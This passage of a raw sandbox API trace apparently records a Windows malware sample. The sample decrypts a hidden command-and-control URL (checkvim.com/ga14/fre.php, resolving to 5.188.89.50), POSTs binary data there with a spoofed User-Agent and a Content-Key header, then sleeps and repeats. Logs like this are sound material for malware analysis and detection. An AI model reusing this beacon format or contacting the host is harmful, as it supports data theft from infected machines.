hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0277.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.262] CryptDestroyKey (hKey=0x87e430) returned 1 [0277.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.264] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0277.264] GetProcessHeap () returned 0x840000 [0277.264] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0277.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.265] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.266] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.268] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.269] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.269] GetProcessHeap () returned 0x840000 [0277.269] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0277.269] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0277.269] GetProcessHeap () returned 0x840000 [0277.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0277.270] GetProcessHeap () returned 0x840000 [0277.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0277.270] GetProcessHeap () returned 0x840000 [0277.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0277.270] GetProcessHeap () returned 0x840000 [0277.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0277.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.271] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0277.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.278] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0277.286] GetProcessHeap () returned 0x840000 [0277.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0277.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.287] CryptImportKey (in: hProv=0x86f2d0, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0277.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.288] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0277.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.290] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.290] GetProcessHeap () returned 0x840000 [0277.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0277.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.291] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0277.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.292] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0277.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.294] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0277.294] GetProcessHeap () returned 0x840000 [0277.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0277.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.295] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0277.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.297] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0277.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.298] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0277.298] GetProcessHeap () returned 0x840000 [0277.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0277.298] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0277.300] GetProcessHeap () returned 0x840000 [0277.300] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0277.300] socket (af=2, type=1, protocol=6) returned 0x42c [0277.300] connect (s=0x42c, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0277.368] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0277.368] GetProcessHeap () returned 0x840000 [0277.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fb50 [0277.368] GetProcessHeap () returned 0x840000 [0277.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0277.369] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0277.370] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0277.370] GetProcessHeap () returned 0x840000 [0277.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0277.371] GetProcessHeap () returned 0x840000 [0277.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0277.371] GetProcessHeap () returned 0x840000 [0277.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0277.371] GetProcessHeap () returned 0x840000 [0277.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0277.372] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0277.372] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0277.373] GetProcessHeap () returned 0x840000 [0277.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0277.373] GetProcessHeap () returned 0x840000 [0277.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0277.373] send (s=0x42c, buf=0x873a58*, len=237, flags=0) returned 237 [0277.373] send (s=0x42c, buf=0x87eb58*, len=159, flags=0) returned 159 [0277.374] GetProcessHeap () returned 0x840000 [0277.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0277.374] recv (in: s=0x42c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fb50 | out: hHeap=0x840000) returned 1 [0277.744] closesocket (s=0x42c) returned 0 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0277.744] GetProcessHeap () returned 0x840000 [0277.744] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0277.745] GetProcessHeap () returned 0x840000 [0277.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0277.745] GetProcessHeap () returned 0x840000 [0277.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0277.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x7ac) returned 0x42c [0277.746] Sleep (dwMilliseconds=0xea60) [0277.748] GetProcessHeap () returned 0x840000 [0277.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0277.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0277.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.755] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0277.781] GetProcessHeap () returned 0x840000 [0277.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0277.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.782] CryptImportKey (in: hProv=0x870128, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0277.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.783] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0277.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.784] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.784] GetProcessHeap () returned 0x840000 [0277.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0277.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.785] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0277.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.786] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0277.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.787] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0277.787] GetProcessHeap () returned 0x840000 [0277.787] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0277.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.791] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.791] GetProcessHeap () returned 0x840000 [0277.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0277.792] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0277.792] GetProcessHeap () returned 0x840000 [0277.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0277.792] GetProcessHeap () returned 0x840000 [0277.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0277.792] GetProcessHeap () returned 0x840000 [0277.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0277.792] GetProcessHeap () returned 0x840000 [0277.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0277.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.796] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0277.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.803] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0277.809] GetProcessHeap () returned 0x840000 [0277.809] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0277.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.811] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0277.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.812] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0277.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.813] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.813] GetProcessHeap () returned 0x840000 [0277.813] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0277.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.814] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0277.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.815] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0277.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0277.816] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0277.816] GetProcessHeap () returned 0x840000 [0277.816] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0277.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.817] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0277.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.818] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0277.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0277.820] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0277.820] GetProcessHeap () returned 0x840000 [0277.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0277.820] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0277.821] GetProcessHeap () returned 0x840000 [0277.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0277.821] socket (af=2, type=1, protocol=6) returned 0x430 [0277.822] connect (s=0x430, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0277.912] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0277.912] GetProcessHeap () returned 0x840000 [0277.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0277.912] GetProcessHeap () returned 0x840000 [0277.912] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0277.913] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0277.914] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0277.914] GetProcessHeap () returned 0x840000 [0277.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0277.914] GetProcessHeap () returned 0x840000 [0277.914] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0277.914] GetProcessHeap () returned 0x840000 [0277.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0277.914] GetProcessHeap () returned 0x840000 [0277.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0277.915] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0277.916] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0277.916] GetProcessHeap () returned 0x840000 [0277.916] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0277.916] GetProcessHeap () returned 0x840000 [0277.916] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0277.916] send (s=0x430, buf=0x873a58*, len=237, flags=0) returned 237 [0277.916] send (s=0x430, buf=0x87eb58*, len=159, flags=0) returned 159 [0277.917] GetProcessHeap () returned 0x840000 [0277.917] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0277.917] recv (in: s=0x430, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0278.308] GetProcessHeap () returned 0x840000 [0278.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0278.308] GetProcessHeap () returned 0x840000 [0278.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0278.308] GetProcessHeap () returned 0x840000 [0278.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0278.308] GetProcessHeap () returned 0x840000 [0278.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0278.308] closesocket (s=0x430) returned 0 [0278.308] GetProcessHeap () returned 0x840000 [0278.309] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0278.309] GetProcessHeap () returned 0x840000 [0278.309] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0278.309] GetProcessHeap () returned 0x840000 [0278.309] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0278.309] GetProcessHeap () returned 0x840000 [0278.309] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0278.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x84c) returned 0x430 [0278.311] Sleep (dwMilliseconds=0xea60) [0278.312] GetProcessHeap () returned 0x840000 [0278.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0278.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.313] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0278.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.320] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fd70) returned 1 [0278.327] GetProcessHeap () returned 0x840000 [0278.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0278.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.328] CryptImportKey (in: hProv=0x86fd70, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0278.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.329] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0278.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.330] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.330] GetProcessHeap () returned 0x840000 [0278.330] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0278.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.331] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0278.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.332] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0278.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0278.332] CryptReleaseContext (hProv=0x86fd70, dwFlags=0x0) returned 1 [0278.332] GetProcessHeap () returned 0x840000 [0278.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0278.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.333] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.334] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.335] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0278.336] StrStrA 